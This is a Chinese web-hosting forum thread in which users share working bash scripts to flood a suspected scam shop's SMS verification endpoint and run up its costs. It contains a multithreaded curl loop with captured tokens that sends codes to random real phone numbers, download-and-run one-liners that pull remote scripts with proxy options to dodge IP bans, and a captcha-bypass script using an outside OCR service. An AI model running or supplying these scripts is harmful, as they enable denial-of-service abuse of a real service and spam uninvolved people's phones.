全球主机交流论坛

标题: 前几天那个诈骗网站,又找到一个可以刷他钱的地方 [打印本页]
作者: etc小号    时间: 2023-11-13 21:44
标题: 前几天那个诈骗网站,又找到一个可以刷他钱的地方
https://vipshop.quanminyanxuan.com/h5-DKD-YS/pages/order/orderQuery.html

这就是发短信的地方,随便熟入个手机号,点击发送,会有这样一个链接

https://danrongh5api.shihuak.com/api/users/sms/generateAuthCode?phone=15985626235&type=loginPhone


不过直接这样刷是不不行的,要带请求头,可以直接右键,复制,复制为cURL(bash)

然后把这个curl拿到服务器循环跑就行

while true
do
curl xxxx(复制的内容)
done


我试了下,大概1秒可以跑5条,一小时就是18000条,不知道单条多少钱,对了,号码最好用随机数,一个号码发不了几条
作者: Wine    时间: 2023-11-13 21:45
哪个诈骗网站来着?
作者: etc小号    时间: 2023-11-13 21:50
Wine 发表于 2023-11-13 21:45
哪个诈骗网站来着?

https://sunk.eu.org/thread-1227393-1-1.html
作者: 麻花滕    时间: 2023-11-13 21:52
这网站不就是套路商城吗,高价卖劣质产品
作者: kldeam    时间: 2023-11-13 21:57
你能不能把curl直接发出来 我直接挂
作者: etc小号    时间: 2023-11-13 21:59
kldeam 发表于 2023-11-13 21:57
你能不能把curl直接发出来 我直接挂
  1. #!/bin/bash
  2. # bam to bed

  4. start_time=`date +%s`  #定义脚本运行的开始时间

  6. tmp_fifofile="/tmp/$$.fifo"
  7. mkfifo $tmp_fifofile   # 新建一个FIFO类型的文件
  8. exec 6<>$tmp_fifofile  # 将FD6指向FIFO类型
  9. rm $tmp_fifofile  #删也可以,

  11. thread_num=10  # 定义最大线程数

  13. #根据线程总数量设置令牌个数
  14. #事实上就是在fd6中放置了$thread_num个回车符
  15. for ((i=0;i<${thread_num};i++));do
  16.     echo
  17. done >&6

  19. while true
  20. do
  21.     # 一个read -u6命令执行一次,就从FD6中减去一个回车符,然后向下执行
  22.     # 当FD6中没有回车符时,就停止,从而实现线程数量控制
  23.     read -u6
  24.     {
  25. num=$(shuf -i 0-9 -n 8 | tr -d '\n')
  26. curl "https://danrongh5api.shihuak.com/api/users/sms/generateAuthCode?phone=159$num&type=loginPhone" \
  27.   -H 'authority: danrongh5api.shihuak.com' \
  28.   -H 'accept: application/json, text/javascript, */*; q=0.01' \
  29.   -H 'accept-language: zh-CN,zh;q=0.9' \
  30.   -H 'channel: null' \
  31.   -H 'contenttype: json' \
  32.   -H 'gdtvid: null' \
  33.   -H 'origin: https://vipshop.quanminyanxuan.com' \
  34.   -H 'referer: https://vipshop.quanminyanxuan.com/' \
  35.   -H 'saascode: W9A8' \
  36.   -H 'sec-ch-ua: "Microsoft Edge";v="119", "Chromium";v="119", "Not?A_Brand";v="24"' \
  37.   -H 'sec-ch-ua-mobile: ?1' \
  38.   -H 'sec-ch-ua-platform: "Android"' \
  39.   -H 'sec-fetch-dest: empty' \
  40.   -H 'sec-fetch-mode: cors' \
  41.   -H 'sec-fetch-site: cross-site' \
  42.   -H 'sign: 2fc5dce2d3b227a945deb23a496b3d0c' \
  43.   -H 'source: weapp' \
  44.   -H 'sourceplatform: vipshop' \
  45.   -H 'timestamp: 1699882219785' \
  46.   -H 'token: 6207045e-873f-0ec2-85af-25a2974913f9' \
  47.   -H 'user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36 Edg/119.0.0.0' \
  48.   -H 'uuid: 6207045e-873f-0ec2-85af-25a2974913f9' \
  49.   --compressed
  50.         echo >&6 # 当进程结束以后,再向FD6中加上一个回车符,即补上了read -u6减去的那个
  51.     } &
  52. done

  54. wait # 要有wait,等待所有线程结束

  56. stop_time=`date +%s` # 定义脚本运行的结束时间
  57. echo "TIME:`expr $stop_time - $start_time`" # 输出脚本运行时间

  59. exec 6>&- # 关闭FD6
  60. echo "over" # 表示脚本运行结束
复制代码
作者: utlion    时间: 2023-11-13 22:00
很好 以后有刷短信接口的业务就找你了。
作者: 御坂    时间: 2023-11-13 22:03
本帖最后由 御坂 于 2023-11-14 01:26 编辑

短信大概一条五分钱,一万条500不到


一小时500块钱,cdn 1G流量才0.15
相当于一小时3T流量,折合等效剑皇带宽为 833MB/s,也就是7Gbps的威力

这边简单的写了个一件脚本,就是楼主发的代码,然后加入了自定义威力设置(因为发现原版程序会把raksmart的小鸡跑到负载2以上,把玩客云负载跑到6以上),使用方法

  1. curl -L https://dl.01r.cc/sms.sh -o sms.sh && chmod +x sms.sh && bash sms.sh 5
复制代码

如果用不了,可以试试换下一个链接下载
  1. curl -L https://dl-2.01r.cc/sms.sh -o sms.sh && chmod +x sms.sh && bash sms.sh 5
复制代码


想用原版的把链接里的sms.sh改成aaa.sh即可

  1. curl -L https://dl.01r.cc/sms2.sh -o sms2.sh && chmod +x sms2.sh && bash sms2.sh 5 --proxy=user:passwd@ip:port
复制代码


sms2.sh 支持传入自定义代理,有时候跑一会就不行了,换个IP才能继续,不知道是不是IP被ban了。


二号下载链接是前阵子论坛里发广告的那个678CDN,免费的那个
下载服务器是10M带宽的raksmart。


这个5代表的是威力大小,数字越大威力越大,5正好是能把玩客云CPU跑到90%左右的情况,所以默认是5
作者: Just纱世里    时间: 2023-11-13 22:07
本帖最后由 Just纱世里 于 2023-11-13 23:42 编辑

可以发短信?!膜拜大佬!

原来只是验证码,我以为可以向任意手机号发送任意字符呢。
作者: 玩呀玩    时间: 2023-11-13 22:07
MJJ人手几个服务器全部出动一天让他破产
作者: 躺平    时间: 2023-11-13 22:09
我已经开始搞起来
  
作者: Kotmilys    时间: 2023-11-13 22:10
御坂 发表于 2023-11-13 22:03
短信大概一条五分钱,一万条500不到

一万条470元,用楼主的脚本跑一个小时18000条,能消耗骗子网站846元。其它套餐包就另算了。
作者: Kotmilys    时间: 2023-11-13 22:11
骗子网站碰上楼主也是倒霉
作者: 御坂    时间: 2023-11-13 22:56
Kotmilys 发表于 2023-11-13 22:10
一万条470元,用楼主的脚本跑一个小时18000条,能消耗骗子网站846元。其它套餐包就另算了。 ...

刚算了算,折合剑皇带宽5G以上了
作者: wlz    时间: 2023-11-13 23:09
没啥用,收不到短信
作者: wwrroopp123    时间: 2023-11-13 23:29
多来点这样的帖子,爱看
作者: Whbgz    时间: 2023-11-13 23:53
御坂 发表于 2023-11-13 22:03
短信大概一条五分钱,一万条500不到

我家里长辈也经常收到,感谢大佬,已经挂三台机子在跑了
作者: trips    时间: 2023-11-13 23:53
这个剑皇的话是不是比跑apk下载舒服?
作者: Whbgz    时间: 2023-11-13 23:56
我这跑了差不多3分钟就被拉黑IP了
作者: 御坂    时间: 2023-11-14 01:19
Whbgz 发表于 2023-11-13 23:56
我这跑了差不多3分钟就被拉黑IP了

curl -L https://dl.01r.cc/sms2.sh -o sms2.sh && chmod +x sms2.sh && bash sms2.sh 5 --proxy=user:passwd@ip:port

支持传入http代理
作者: lili    时间: 2023-11-14 01:58
一窝蜂上,刷爆他
作者: kikuri    时间: 2023-11-14 04:44
是个大佬哇
作者: insad    时间: 2023-11-14 04:49
这网站不就是套路商城吗?
作者: zhongziso    时间: 2023-11-14 06:35
不能做图床吗?
作者: fanghua    时间: 2023-11-14 10:17
Whbgz 发表于 2023-11-13 23:53
我家里长辈也经常收到,感谢大佬,已经挂三台机子在跑了

这个是啥客户端?
作者: 金豆    时间: 2023-11-14 10:19
深圳市一探究竟科技有限公司
作者: longmao    时间: 2023-11-14 14:35
本帖最后由 longmao 于 2023-11-14 14:37 编辑

@etc小号 @御坂 刚翻阿里小号 发现这诈骗网站还有其他站点https://dxjf.vipmalljf.com/pages/order/orderlist.html

短信接口:
https://h5api.lickeji.com/users/sms/generateAuthCode?phone=13988888888&type=loginPhone
作者: 1010    时间: 2023-11-14 14:36
作者: wzw    时间: 2023-11-14 14:37
你这个好
作者: sanxian    时间: 2023-11-14 14:51
提示: 作者被禁止或删除 内容自动屏蔽
作者: etc小号    时间: 2023-11-14 17:00
sanxian 发表于 2023-11-14 14:51
同问,这是啥shell面板

finalshell
作者: sanxian    时间: 2023-11-14 17:21
提示: 作者被禁止或删除 内容自动屏蔽
作者: Whbgz    时间: 2023-11-14 21:41
fanghua 发表于 2023-11-14 10:17
这个是啥客户端?

nxshell,可以在微软store下
作者: Whbgz    时间: 2023-11-14 21:43
sanxian 发表于 2023-11-14 14:51
同问,这是啥shell面板

nxshell
作者: fanghua    时间: 2023-11-14 22:05
Whbgz 发表于 2023-11-14 21:43
nxshell

多谢
作者: Lando    时间: 2023-11-14 22:21
好像有点高级啊
作者: 关機    时间: 2023-11-14 22:23
搞起来
作者: sanxian    时间: 2023-11-14 23:13
提示: 作者被禁止或删除 内容自动屏蔽
作者: ⊙⊙    时间: 2023-11-14 23:22
本帖最后由 ⊙⊙ 于 2023-11-14 23:26 编辑

侠之大者,为国为民。楼主威武!!!


作者: etc小号    时间: 2023-11-14 23:34
sanxian 发表于 2023-11-14 17:21
充钱了么

我看错了,以为问我用的啥呢,我用的finalshell
作者: 8848tjsj    时间: 2023-11-14 23:42
etc小号 发表于 2023-11-13 21:59

这个直接复制下来就能执行吗?我试了下提示参数错误
作者: acm    时间: 2023-11-14 23:44
有些干黑灰的程序员水平太差
作者: 长泰    时间: 2023-11-15 09:21
我老爸被这种垃圾网站骗了好几次,老人家贪小便宜,又固执又好骗,唉
作者: etc小号    时间: 2023-11-15 11:19
御坂 发表于 2023-11-13 22:03
短信大概一条五分钱,一万条500不到

代码更新了,现在需要验证码了,我写了个脚本,目前的问题是,识别验证码用的mjj给的,识别率有点低
https://sunk.eu.org/thread-1227092-1-1.html

  1. while true
  2. do
  3. json_data=$(curl 'https://danrongh5api.shihuak.com/api/users/userCaptcha/captchaVerify' \
  4.   -H 'authority: danrongh5api.shihuak.com' \
  5.   -H 'accept: application/json, text/javascript, */*; q=0.01' \
  6.   -H 'accept-language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6' \
  7.   -H 'channel: null' \
  8.   -H 'contenttype: json' \
  9.   -H 'gdtvid: null' \
  10.   -H 'origin: https://vipshop.quanminyanxuan.com' \
  11.   -H 'referer: https://vipshop.quanminyanxuan.com/' \
  12.   -H 'saascode: W9A8' \
  13.   -H 'sec-ch-ua: "Chromium";v="118", "Microsoft Edge";v="118", "Not=A?Brand";v="99"' \
  14.   -H 'sec-ch-ua-mobile: ?1' \
  15.   -H 'sec-ch-ua-platform: "Android"' \
  16.   -H 'sec-fetch-dest: empty' \
  17.   -H 'sec-fetch-mode: cors' \
  18.   -H 'sec-fetch-site: cross-site' \
  19.   -H 'sign: 567f34a9919ea9cd7bf732c6973e74a4' \
  20.   -H 'source: weapp' \
  21.   -H 'sourceplatform: vipshop' \
  22.   -H 'timestamp: 1700015165139' \
  23.   -H 'token: 2bb0b928-047b-752f-a361-b80e25a4f043' \
  24.   -H 'user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Mobile Safari/537.36 Edg/118.0.2088.69' \
  25.   -H 'uuid: 2bb0b928-047b-752f-a361-b80e25a4f043' )
  26. key=$(echo $json_data | jq -r '.data.key')
  27. image=$(echo $json_data | jq -r '.data.image' | sed 's/^data:image\/png;base64,//')
  28. echo "Key: $key"
  29. echo "Image: $image"

  31. result_data=$(curl 'https://ocr.zhu.ee/api.Arithmetic_VerificationCode' -X POST -d '{"ImageBase64": "'"$image"'"}' --header "Content-Type: application/json")
  32. result=$(echo $result_data | jq -r '.result')
  33. echo $result_data
  34. echo $result
  35. num=$(shuf -i 0-9 -n 8 | tr -d '\n')
  36. curl "https://danrongh5api.shihuak.com/api/users/sms/generateAuthCode?phone=176$num&type=loginPhone&captchaKey=$key&captchaValue=$result" \
  37.   -H 'authority: danrongh5api.shihuak.com' \
  38.   -H 'accept: application/json, text/javascript, */*; q=0.01' \
  39.   -H 'accept-language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6' \
  40.   -H 'channel: null' \
  41.   -H 'contenttype: json' \
  42.   -H 'gdtvid: null' \
  43.   -H 'origin: https://vipshop.quanminyanxuan.com' \
  44.   -H 'referer: https://vipshop.quanminyanxuan.com/' \
  45.   -H 'saascode: W9A8' \
  46.   -H 'sec-ch-ua: "Chromium";v="118", "Microsoft Edge";v="118", "Not=A?Brand";v="99"' \
  47.   -H 'sec-ch-ua-mobile: ?1' \
  48.   -H 'sec-ch-ua-platform: "Android"' \
  49.   -H 'sec-fetch-dest: empty' \
  50.   -H 'sec-fetch-mode: cors' \
  51.   -H 'sec-fetch-site: cross-site' \
  52.   -H 'sign: a923dcf0cd9901477bb072aad31193c2' \
  53.   -H 'source: weapp' \
  54.   -H 'sourceplatform: vipshop' \
  55.   -H 'timestamp: 1700015169913' \
  56.   -H 'token: 2bb0b928-047b-752f-a361-b80e25a4f043' \
  57.   -H 'user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Mobile Safari/537.36 Edg/118.0.2088.69' \
  58.   -H 'uuid: 2bb0b928-047b-752f-a361-b80e25a4f043' \
  59.   --compressed

  61. done
复制代码




欢迎光临 全球主机交流论坛 (https://sunk.eu.org/) Powered by Discuz! X3.4